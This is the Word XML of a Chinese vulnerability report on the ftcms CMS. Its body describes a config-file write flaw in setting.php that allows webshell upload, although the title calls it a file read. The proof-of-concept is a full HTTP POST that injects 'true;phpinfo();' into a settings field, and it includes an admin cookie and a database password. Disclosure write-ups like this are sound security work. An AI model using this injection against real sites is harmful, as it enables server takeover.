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B01B" w14:textId="760D4D5C" w:rsidR="00D5390D" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00135D72">
        <w:t>ftcms前台任意文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DBCA0" w14:textId="23BD5D1C" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9AF53" w14:textId="5D2D53CB" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F5A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面存在文件</w:t>
      </w:r>
      <w:r w:rsidR="007F5A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，导致攻击者可以通过该漏洞</w:t>
      </w:r>
      <w:r w:rsidR="007F5A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入木马，导致获取服务器权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17B785" w14:textId="02921ADF" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞影响：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D9476" w14:textId="048C2DDF" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C87DA3" w14:textId="799B935B" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞代码分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6070FE58" w14:textId="69DA7293" w:rsidR="007F5A11" w:rsidRPr="007F5A11" w:rsidRDefault="007F5A11" w:rsidP="007F5A11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C6A4DDC" wp14:editId="0903DE14">
            <wp:extent cx="5274310" cy="1447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9F69" w14:textId="2EF48AB5" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72"/>
    <w:p w14:paraId="4DEC3F88" w14:textId="28A55D68" w:rsidR="00135D72" w:rsidRDefault="007F5A11" w:rsidP="00135D72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ost</w:t>
      </w:r>
      <w:r w:rsidR="00135D72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求获取参数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后将&amp;data内容写</w:t>
      </w:r>
      <w:r w:rsidR="00135D72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根目录下的config</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidR="000002F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD61C8" w14:textId="44BCA27E" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2977D" w14:textId="7199A4D3" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4">
      <w:r>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E551842" w14:textId="11905B25" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4"/>
    <w:p w14:paraId="471341DA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POST /admin/index.php/setting/setting_edit HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D234EB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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344E45A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Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F92763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Accept-Language: zh-CN,zh;q=0.9,en;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2568E0E0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Cache-Control: max-age=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387B808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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABEFC2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Content-Length: 1872</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719D20D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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRtPVxXjT058OnVv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049BF7C5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Cookie: username=admin; pwd=admin; PHPSESSID=ma3udf28af6os8g2g8oou7og37; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2227a55437b5348c14582dffdcc5dce4db%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A115%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F101.0.4951.54+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1653532463%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22user%22%3Ba%3A11%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A32%3A%2221232f297a57a5a743894a0e4a801fc3%22%3Bs%3A5%3A%22email%22%3Bs%3A15%3A%22admin%40localhost%22%3Bs%3A7%3A%22regtime%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22regip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A9%3A%22logintime%22%3Bs%3A10%3A%221653531217%22%3Bs%3A7%3A%22loginip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22hits%22%3Bs%3A1%3A%226%22%3Bs%3A9%3A%22listorder%22%3Bs%3A1%3A%220%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%2215%22%3B%7D%7D1ecafdb35793618fa2c2375f7f5fd8d7725e0934</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CF922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Host: ftcms.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E92E0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Origin: http://ftcms.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C056939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Referer: http://ftcms.io/admin/index.php/setting/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A2A559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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE01B3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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56841CF9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5585A58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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498EAC4C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Content-Disposition: form-data; name="info[wl_page][news]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0174C0A5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70F3608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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98C4AD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BDD1EE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Content-Disposition: form-data; name="info[wl_db][hostname]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B49F6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8C14C8B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localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA232CF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83FF86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Content-Disposition: form-data; name="info[wl_db][username]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE86BB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6B37F9C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</w:p>
    <w:p w14:paraId="3F336F0B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3337DE00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Content-Disposition: form-data; name="info[wl_db][password]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C7A26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DF6B69B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a2015210703</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC837FF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1818EF01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Content-Disposition: form-data; name="info[wl_db][database]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95CA24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0787337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ftcms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8B7EF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E51316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Content-Disposition: form-data; name="info[wl_water][action]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019E801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CE6489D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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C93E4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42580A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Content-Disposition: form-data; name="info[wl_water][min_image_w]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3832AE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5FCF5C9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300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546DD8D0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152397A1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Content-Disposition: form-data; name="info[wl_water][min_image_h]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117CBCD4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964D379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198</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11CD95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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42089416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Content-Disposition: form-data; name="info[wl_down][action]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E25EA5B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F9C8125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true;phpinfo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62134B58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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E662F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Content-Disposition: form-data; name="info[wl_down][max_image_w]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2CC2E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CBFAF8A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600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE2F21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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B22D157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Content-Disposition: form-data; name="info[wl_ts][db_debug]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5D3F7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D619101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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304D13F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADC175C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Content-Disposition: form-data; name="info[wl_ts][db_debug_file]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878E41D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0D3EF26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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A4AA4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5E3425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Content-Disposition: form-data; name="info[wl_ts][error]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12033C9F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13956B0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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF56E2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A74F7BD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Content-Disposition: form-data; name="info[wl_ts][cache]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5450ED1E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FA58179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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64D62C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7679404E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Content-Disposition: form-data; name="info[wl_sdk][code]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A4E6E0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539E0A3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ec7eb10c6141485bfb8dada539365653</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786BAF11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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562827EB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Content-Disposition: form-data; name="dosubmit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D904F3E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43CD472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Ð¤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAEC181" w14:textId="77777777" w:rsidR="007F5A11" w:rsidRPr="007F5A11" w:rsidRDefault="007F5A11" w:rsidP="007F5A1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A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------WebKitFormBoundaryBRtPVxXjT058OnVv--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68221105" w14:textId="0A3399D5" w:rsidR="000002F4" w:rsidRPr="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F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DF3EC1E" w14:textId="77777777" w:rsidR="000002F4" w:rsidRPr="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F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A0552A3" w14:textId="21DA5F0F" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞截图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D88BB" w14:textId="57F3564F" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4"/>
    <w:p w14:paraId="2D42EF84" w14:textId="27813FC3" w:rsidR="000002F4" w:rsidRDefault="007F5A11" w:rsidP="000002F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E77DE04" wp14:editId="774EDD00">
            <wp:extent cx="5274310" cy="3267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F1EF" w14:textId="37009E0B" w:rsidR="007F5A11" w:rsidRPr="000002F4" w:rsidRDefault="007F5A11" w:rsidP="000002F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DBBD4C1" wp14:editId="1F9D36EE">
            <wp:extent cx="5274310" cy="2870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A11" w:rsidRPr="00000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02E0" w14:textId="77777777" w:rsidR="00110B07" w:rsidRDefault="00110B07" w:rsidP="00135D72">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0D144FCE" w14:textId="77777777" w:rsidR="00110B07" w:rsidRDefault="00110B07" w:rsidP="00135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76DDE" w14:textId="77777777" w:rsidR="00110B07" w:rsidRDefault="00110B07" w:rsidP="00135D72">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19FF3DEE" w14:textId="77777777" w:rsidR="00110B07" w:rsidRDefault="00110B07" w:rsidP="00135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42"/>
    <w:rsid w:val="000002F4"/>
    <w:rsid w:val="00110B07"/>
    <w:rsid w:val="00135D72"/>
    <w:rsid w:val="007F2CF2"/>
    <w:rsid w:val="007F5A11"/>
    <w:rsid w:val="00B51042"/>
    <w:rsid w:val="00C14A98"/>
    <w:rsid w:val="00D2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F8850"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3DE93E2F-B27A-43F9-987B-892016EF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D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5D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5D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D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5D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5D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c0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00000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41">
    <w:name w:val="sc641"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000002F4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="00000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yulin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>liu yulin</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-26T03:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T03:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>